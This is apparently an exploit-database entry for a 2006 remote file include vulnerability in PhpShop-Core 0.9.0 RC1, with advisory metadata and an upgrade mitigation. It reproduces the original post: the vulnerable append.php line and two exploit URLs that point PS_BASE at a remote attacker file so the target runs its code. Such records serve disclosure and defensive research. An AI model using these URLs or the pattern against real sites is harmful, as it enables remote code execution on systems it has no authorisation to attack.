PhpShop-Core (append.php) Remot File Include Vulnerability

vendor:

PhpShop-Core

by:

Cold Zero

7,5

CVSS

HIGH

Remote File Include Vulnerability

CWE

Product Name: PhpShop-Core

Affected Version From: 0.9.0 RC1

Affected Version To: 0.9.0 RC1

Patch Exists: Yes

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

PhpShop-Core (append.php) Remot File Include Vulnerability

A remote file include vulnerability exists in PhpShop-Core v0.9.0 RC1. An attacker can exploit this vulnerability to include a remote file containing malicious code, resulting in arbitrary code execution on the vulnerable system.

Mitigation:

Upgrade to the latest version of PhpShop-Core.

Source

Exploit-DB raw data:

--------------------------------------||  Viva Palestine ||-----------------------------------------

PhpShop-Core (append.php)  Remot File Include Vulnerability

Found By : CoLd Zero  [ Wasem898 ]

Source   : include_once ($4AZHAR_TeAM."Securty.");

PalesTine Arab Muslim Hacker's

######################################################
#
#            PhpShop-Core  v0.9.0 RC1
#
# Class:     Remote File Include Vulnerability
# Published  2006-10-27
# Remote:    Yes
# Type:      Dangerous
# Site:      http://www.comscripts.com/jump.php?action=script&id=81
#
# Author:    Cold Zero
# Contact:   c.o.1.d.0@hotmail.com
#
######################################################


file ;

/core/html/append.php
/core/demo/append.php

==========================

Vuln Code

<?php
//
// This footer information must be on every page!
require($PS_BASE."modules/core/lib/ps_page_close.inc");

?>
======================================================

Exploit :

Http://www.Victem.0/[phpshop-core_PaTH]/modules/core/demo/append.php?PS_BASE=http://www.human2human.org/cold.txt?

Http://www.Victem.0/[phpshop-core_PaTH]/modules/core/html/append.php?PS_BASE=http://www.human2human.org/cold.txt?

----  Thanx: [MoHaNdKo] [Cold ThreE] [Viper Hacker] [The Wolf KSA] [o0xxdark0o[ [OrGanza] [H@mLiT] [Snake12][Root Shell] [Metoovit] [Fucker_net] [Rageeb]

----  GreeTz: AlL : 4azhar.Com Members , All Xp10.com Members , Lezr.com Member  , xhahax.org Members  , Hack1h.com Members : Dm3r7.com Members

--------------------------------------||  Viva Palestine ||-----------------------------------------

# milw0rm.com [2006-10-28]